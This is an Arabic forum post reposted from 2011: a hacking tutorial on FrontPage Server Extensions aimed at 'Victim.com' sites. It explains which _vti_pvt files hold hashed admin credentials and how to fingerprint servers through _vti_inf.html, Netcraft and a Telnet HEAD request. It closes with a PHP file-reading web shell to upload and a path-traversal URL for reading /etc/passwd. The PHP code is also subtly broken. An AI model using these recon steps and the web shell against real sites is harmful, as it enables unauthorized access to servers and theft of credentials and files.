بسم الله الرحمن الرحيم
" معلومات مهمة عن المواقع التي تدعم الفرونت بيج "
<منقول>
<الكاتب: T.O.L. ( DeXXa ) .>
ما الذي يجب أن تعرفه قبل قراءة هذا الدرس :
* الالمام بالانجليزية .
* قراءة المزيد عن الـ FrontPage Server Extensions و ليس كيفية اختراقه .
* كيفية التعامل مع برنامج Microsoft Office FrontPage .
* كيفية التعامل مع الـ CHMOD .
* كيفية التعامل مع الـ Telnet .
* كيفية التعامل مع بروتوكول HTTP .
* كيفية التعامل مع قواعد البيانات العلائقية SQL .
* كيفية التعامل مع أحد لغات الويب و التي تعمل بناحية الخادم Server Side Scripting Language .
و اذكر أخيراً بأني اؤمن بأن المخترق ما هو إلا انسان وظيفته البرمجة و ادارة و تحليل النظم و الشبكات و ليس انسان همه هو معرفة القليل
من الأمور التي تساعده في التخريب و العبث بما تعب به الآخرون و تضييع الوقت في الدردشة و التسكع بمقاهي الانترنت ، و لذا فافترض بأن
ما أقوله سيكون واضحاً و لا يحتاج لـ Screen Capture .
@ خريطة الموضوع :
. ما الذي ستسفيده عند قراءة الموضوع ؟
. مقدمة
. ما هو الـ FrontPage Server Extensions ؟
. ما هي آلية عمل الـ FrontPage Extension Server ؟
. كيفية الاتصال بـ FrontPage Extension Server
. كيفية معرفة هل الموقع يدعم الـ FrontPage أم لا
. كيفية استغلاله ليصبح في صلاحك
@ ما الذي ستستفيده عند قراءتك للموضوع ؟
* ستعرف ما هو الـ FrontPage Server Extensions .
* آلية عمله .
* كيفية جمع المعلومات الخاصة بأي موقع .
* بعض الطرق للاستفادة منه عند الاتصال بالخادم الخاص به .
@ مقدمة :
تسعى شركات التسكين بأنواعها توفير شتى شبل الراحة لعملائها ، فتجدهم يقدمون العروض و التخفيضات لارضاء العملاء مثل دعم لـ PHP و
CGI و Perl و SSL و FTP و SQL .
و بالنسبة لمدارء المواقع Webmasters فإن البرنامج المفضل لهم لتصميم مواقعهم هو Microsoft Office FrontPage و الذي كما هو مبين يأتي
مع حزمة Office ، اذ يتميز بسهولة استعماله كما انه يوفر بعض البرمجيات مثل عداد الزوار ، و لذا تقدم شركات التسكين دعم كامل للبرنامج .
@ ما هو الـ FrontPage Server Extensions ؟
( ملاحظة : سأتكلم حالياً عن الحزم التي أتت بعد حزمة الاصدار الثاني )
هو عبارة عن حزمة من البرامج يتم تثبيتها في الخادم Server الخاص بشركة التسكين التي لها قالبية لدعم بعض الخصائص .
و عند التثبيت يجب انشاء عدة مجلدات منها :
/_private
/_vti_bin
/_vti_cnf
/_vti_log
/_vti_pvt
/_vti_txt
و سأتكلم عن وظيفة كل مجلد يهمنا :
* المجلد _vti_bin :
و يتواجد بداخله مجلدان هما :
( ملاحظة : النقطتان تشيران إلى المجلد _vti_bin )
../_vti_adm/
../_vti_aut/
الثاني لا يهمنا بقدر ما يهم المجلد الأول اذ أنه الخاص بالمشرف ولا تستطيع الاستفادة منه اذا لم تحصل على كلمة المرور الخاصة به .
كما يوجد ملفان هما :
../shtml.exe
../fpcount.exe
* المجلد _vti_pvt :
و يتواجد بداخله عدة ملفات ما يهمنا منها هو الملفات التالية :
- الملف service.pwd : و فيه يتواجد المعرف و كلمة المرور الخاصة بالمشرف مشفرة بمقياس DES .
- الملف service.grp : و فيه يتواجد المعرفين من مشرفين و authors .
- ملفي deptodoc.btr و doctodep.btr : و فيه يتواجد مسارات الملفات التي تم تحميلها على الخادم ، فاذا قمت بتنزيله فتستطيع معرفة الملفات
الموجودة بالموقع .
و في الغالب لا تستطيع معاينة محتويات المجلد اذ يوجد في المجلد الرئيسي للموقع ملف .htaccess يقوم بمنع الجميع ( المالك و المجموعة و
الزوار ) من معاينة المجلد و محتوياته .
( ملاحظة : ان عدم وضع أي صلاحية على المجلدلا يعني بأنها تعتبر ثغرة و لكن ضعف من الناحية )
* المجلد _private :
و يتواجد بداخله ملف واحد فقط هو .htaccess .
@ ما هي آلية عمل الـ FrontPage Extension Server ؟
يعتمد الاتصال بين العميل و الـ FrontPage Extension Server على بروتوكول الـ HTTP .
فلو اردنا معاينة عداد الزوار عن طريق برنامج الـ FrontPage فانه يتم ارسال طلب Request للخادم ثم يمرره الخادم بالـ FrontPage Extension Server
و الذي يمرره بالتالي ببرمجيات الخادم مثل fpcount.exe ، و من ثم يكرر تمريره مرة أخرى إلى الـ Extension Server و إلى الخادم و يظهر المخرجات
لـ العميل ، علماً ان هذه الاتصالات تتم عبر جدار نار .
@ كيفية الاتصال بـ FrontPage Extension Server :
كما ذكرنا سابقاً ان أغلب شركات التسكين تسعى لراحة العملاء ، فتجدها تدعم خدمة الـ FrontPage و ذلك لتحميل الصفحات للموقع علماً بأنها
تدعم بروتوكول الـ FTP و تحميل الملفات و انشاء المجلدات عبر المتصفح اعتماداً على البرمجيات التي تعمل بناحية الخادم .
و الآن قم بتنفيذ التالي لمعرفة كيفية الاتصال بالـ FrontPage Extension Server :
( ملاحظة : سأتكلم حالياً عن حزمة الـ XP و التي لا تختلف أبداً عن الحزم الباقية إلا في بعض النقاط الشكلية )
* قم بتشغيل برنامج الـ FrontPage و الذي يأتي مرفقاً مع حزمة Office .
* من قائمة File قم باختيار Open Web .
* قم باضافة المعرف و كلمة المرور ( الأصلية و ليست المشفرة ) .
* اذا كانت صحيحة سيظهر لك الخادم ملفات الموقع كلها و عندها تستطيع التحميل و التعديل في الملفات و المجلدات و معاينة الشفرة المصدرية
للملفات .
* اذا لم تتم العملية بنجاح فهذا يعني بأن الموقع لا يدعم الخدمة أو أن المعرف أو كلمة المرور خاطئة و يطلب منك معاينتها في وضعية القراءة و لا
يظهر لك الشفرة المصدرية الأصلية ولا المجلدات و الملفات التي يحويها الموقع .
@ كيفية معرفة هل الموقع يدعم الـ FrontPage أم لا :
يوجد العديد من الطرق لمعرفة قابلية الموقع لدعم الفرونت بيج نذكر منها :
* معاينة ملف نجاح التثبيت :
( ملاحظة : قد لا تجد ملف _vti_inf.html و لكن هذا لا يعني أن الموقع لا يدعم الخدمة ، كما أنه لا يعتبر ثغرة )
- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بمعانية ملف _vti_inf.html بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :
http://www.Victim.com/_vti_inf.html - و عند معاينة الصفحة ستجد جملة FrontPage Configuration Information ، فهذا معناه أن حزمة الـ FrontPage Extension Server قد تم تثبيتها
في الخادم بنجاح .
و لمعرفة اصدارة الخدمة قم بالتالي :
- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث عن FPVersion="Version" حيث Version تشير للاصدار الخاص بالخدمة .
* عن طريق مجلد _vti_cnf :
- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بمعانية المجلد بواسطة المتصفح و ذلك بارفاقه بعنوان الموقع ، مثال :
http://www.Victim.com/_vti_cnf - قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث عن الشفرة التالية :
vti_generator:Programe
- حيث Programe يشير لنوع البرنامج و اصدارته و سيكون في حالتنا هو Microsoft FrontPage X و الاصدارة الخاصة به هي X .
* الكشف عن الشفرة المصدرية للصفحة :
- قم بزيارة أي موقع تريد أن تعرف هل الخادم الخاص به يدعم الـ FrontPage أم لا .
- قم بالنقر بزر الفأرة الأيمن على الصفحة ، ثم قم باختيار Source Code .
- قم بالبحث بين ترميزي الرأس <Head></Head> عن الشفرة التالية :
<**** Name="GENERATOR" &@#&@#&@#&@#&@#&@#&@#="Programe">
- حيث Programe يرمز لنوع البرنامج و اذا كان البرنامج هو Microsoft FrontPage X.0 يتبين لنا بأن الخادم الخاص بالموقع يدعم الفرونت بيج و
الاصدارة الخاصة به هي X .
* عن طريق موقع NetCraft :
- قم بزيارة الموقع NetCraft.net .
- قم بكتابة عنوان الموقع مستثنياً الـ
http:// .
- انتظر بضع ثواني .
- ستجد أن الموقع أعطاك بعض المعلومات عن الملقم و الخدمات الموجودة في الموقع الذي تريد معرفة قابلية دعمه للبرنامج ، و من تلك الخدمات
خدمة الـ FrontPage و ستظهر لك بالشكل mod_frontpage/X حيث X يرمز لاصدارة الـ FrontPage Extensions Server .
* عن طريق الـ Telnet :
( ملاحظة : تساعد هذه الطريقة في معرفة بعض المعلومات عن الخادم و المخرجات هي نفس مخرجات الطريقة السابقة )
- من قائمة Start قم باختيار Run و اكتب بالنافذة التي ستظهر Telnet .
- قم بالاتصال بالموقع عبر المنفذ 80 بالشكل التالي :
Microsoft Telnet> Open
www.Victim.com 80
- قم بارسال طلب Request للخادم و لتكن الطريقة Method هي Head .
( ملاحظة : عليك الالمام بكيفية التعامل مع بروتوكول HTTP )
- قم بارسال التالي حيث
http://www.Victim.net هو الموقع الضحية و ISP.net هو البروكسي الخاص بمزود الخدمة الخاص بك :
Head
www.Victim.net HTTP/1.1
Host: ISP.net
Accept: */*
Connection: close
- انتظر بضع ثواني .
- ستستلم الاجابة Response عن الطلب الذي ارسلتهب للخادم Server مثل تاريخ آخر تعديل للصفحة و نوع الملقم و الخدمات المتوفرة به .
و من ضمن الخدمات ستجد نفس الذي وجدناه في الطريقة السابقة و هو أن خدمة الـ FrontPage و ستظهر لك بالشكل mod_frontpage/X
حيث X يرمز لاصدارة الـ FrontPage Extensions Server .
@ كيفية استغلاله ليصبح في صالحك :
اذا عثرت على موقع يدعم هذه الخدمة و لم يتم وضع صلاحيات على مجلد الـ _vti_pvt قم بالتالي :
( ملاحظة : عليك الالمام بلغة تعمل على ناحية الخادم و في حالتنا فهي الـ PHP ، كما أن على الموقع الضحية دعم هذه اللغة )
* قم بالاتصال بالموقع الضحية .
* قم بتحميل ملف ينتهي امتداده بـ PHP و ضمنه التالي :
<?PHP
$open = FOpen($file, "r");
$get = FGets($open, FileSize($file));
Echo $get;
FClose $open;
?>
و قمنا هنا برفع ملف PHP للخادم يقوم بفتح ملف غير معين ثم يحضر محتوياته على حسب حجمه بالبايت ثم يعرضه ثم يغلق الملف ، و الآن كل
ما عليك فعله الآن هو الدخول على الموقع عبر المتصفح و الحاقه بـ بعنوان الملف الذي حملته و المتغير file و الملف الذي تريد معاينة الشفرة
المصدرية الخاصة به ، مثال :
http://www.Victim.com/uploded_file...../../etc/passwd حيث uploded_file يشير لاسم الملف الذي قمت بتحميله ، و تستطيع اضافة اوامر تسمح لك بمعاينة الملفات و المجلدات الموجودة في الخادم .
انتهى،،،
بالتوفيق
الخميس 10 فبراير 2011, 6:53 am من طرف 
